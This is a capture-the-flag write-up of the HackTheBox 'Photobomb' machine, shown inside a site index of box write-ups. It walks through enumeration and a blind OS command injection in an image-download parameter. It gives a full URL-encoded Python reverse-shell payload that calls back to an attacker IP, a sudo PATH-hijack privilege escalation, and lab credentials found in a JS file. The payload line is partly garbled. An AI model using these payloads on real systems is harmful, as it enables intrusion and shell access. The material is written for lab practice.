HTB Writeups
  • HTB Writeups
  • Boxes: Very Easy
    • Academy
    • Archetype
    • Arctic
    • Base
    • Bike
    • Blue
    • Explosion
    • Included
    • Markup
    • Oopsie
    • Redeemer
    • Responder
    • Shield
    • Unified
    • Vaccine
  • Boxes: Easy
    • Analytics
    • Armageddon
    • Bashed
    • Beep
    • Blocky
    • Bounty Hunter
    • Buff
    • Cap
    • CozyHosting
    • Devel
    • Explore
    • Forest
    • Grandpa
    • Granny
    • Horizontall
    • Jerry
    • Keeper
    • Knife
    • Lame
    • Late
    • Legacy
    • Mirai
    • Netmon
    • Nibbles
    • Optimum
    • Paper
    • Photobomb
    • Precious
    • RedPanda
    • Return
    • Sau
    • ScriptKiddie
    • Sense
    • Servmon
    • Shocker
    • Shoppy
    • Squashed
    • Trick
  • Boxes: Medium
    • Poison
  • Challenges
    • Behind the Scenes
    • Canvas
    • Debugging Interface
    • Digital Cube
    • Easy Phish
    • Find the Easy Pass
    • Forest
    • Infiltration
    • misDIRection
    • Pusheen Loves Graphs
    • Retro
    • Signals
    • The Secret of a Queen
    • Wrong Spooky Season
  • Fortresses
  • Cyber Apocalypse 2023: The Cursed Mission
    • The Cursed Mission
    • Alien Cradle
    • Critical Flight
    • Debug
    • Extraterrestrial Persistence
    • Getting Started
    • Needle in the Haystack
    • Orbital
    • Packet Cyclone
    • Passman
    • Perfect Sync
    • Persistence
    • Plaintext Tleasure
    • Questionnaire
    • Reconfiguration
    • Relic Maps
    • Roten
    • Secret Code
    • Shattered Tablet
    • Small StEps
  • Hack the Boo 2023
    • Hauntmart
    • Spellbrewery
    • Trick or Treat
    • Valhalloween
  • Cyber Apocalypse 2024: Hacker Royale
    • Hacker Royale
    • An Unusual Sighting
    • BoxCutter
    • BunnyPass
    • Character
    • Data Siege
    • Delulu
    • Dynastic
    • Fake Boost
    • Flag Command
    • Game Invitation
    • It has begun
    • KORP Terminal
    • Labyrinth Linguist
    • LockTalk
    • Lucky Faucet
    • Makeshift
    • Maze
    • Packed Away
    • Phreaky
    • Primary Knowledge
    • Pursue the Tracks
    • Rids
    • Russian Roulette
    • Stop Drop and Roll
    • Testimonial
    • TimeKORP
    • Unbreakable
    • Urgent
  • CYBER APOCALYPSE 2025: Tales from Eldoria
    • Tales from Eldoria
    • A New Hire
    • Cave Expedition
    • Echoes in Stone
    • Eldorion
    • Embassy
    • EncryptedScroll
    • HeliosDEX
    • Quack Quack
    • Silent Trap
    • Stealth Invasion
    • Tales for the Brave
    • The Ancient Citadel
    • The Hillside Haven
    • The Stone That Whispers
    • Thorins Amulet
    • ToolPie
    • Traces
    • Trial by Fire
    • Whispers of the Moonbeam
Powered by GitBook
On this page
  • Enumeration
  • Blind OS Command Injection
  • SUID + SetEnv Script
  1. Boxes: Easy

Photobomb

Personal Rating: Medium

Enumeration

sudo nmap -sV <IP>

  • nginx 1.18 with a webserver on port 80 and ssh port 22 are open

  • There was interesting info in the source code:

<p>To get started, please <a href="/printer" class="creds">click here!</a> (the credentials are in your welcome pack).</p>
<p>If you have any problems with your printer, please call our Technical Support team on 4 4283 77468377.</p>

I continued with some dir fuzzing:

fuzzing:
	/printer
	/printers
	/printerfriendly
	/printer_friendly
	/printer-friendly	
	/printer_icon
	/printer-icon
	/printerFriendly	
-> All show the same page

When giving a non existing page, there is an interesting error:

You can download files. If you check the request with burp and test around with different injections, there is a different output if ;something is included. So there might me a blind OS command injection.

Blind OS Command Injection

If you inject at the filetype with this payload: jpg;ping+-c+4+10.10.16.4 you can see with tcpdump that the command has been executed.

Checking different reverse shell payload, none worked. Only if you use a specific python reverse shell, url encode = and &, and replace spaces with + it works apparently

This was the payload that worked in the end:

photo=voicu-apostol-MWER49YaD-M-unsplash.jpg&filetype=jpgphoto=voicu-apostol-MWER49YaD-M-
	unsplash.jpg&filetype=jpg;photo=voicu-apostol-MWER49YaD-M-
	unsplash.jpg&filetype=jpg;export+RHOST%3d"10.10.16.4ls"%3bexport+RPORT%3d4444%3bpython3+-c+'import+sys,socket,os,pty%3bs%3dsocket.socket()%3bs.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))))%3b[os.dup2(s.fileno(),fd)+for+fd+in+(0,1,2)]%3bpty.spawn("sh")'&dimensions=3000x2000

SUID + SetEnv Script

sudo -l reveals, that /opt/cleanup.sh is an SUID binary where you also have SETENV permissions.

With setenv you can change the path for the program. Since find is called with a relative path, you can create a "find" that contains /bin/bash in the homedir of the user “wizard” and then execute the program, making use of the SUID and SETENV permissions:

sudo PATH=/home/wizard:/bin /opt/cleanup.sh

PreviousPaperNextPrecious

Last updated 1 year ago

There is a JS file containing

http://pH0t0:b0Mb!@photobomb.htb/printer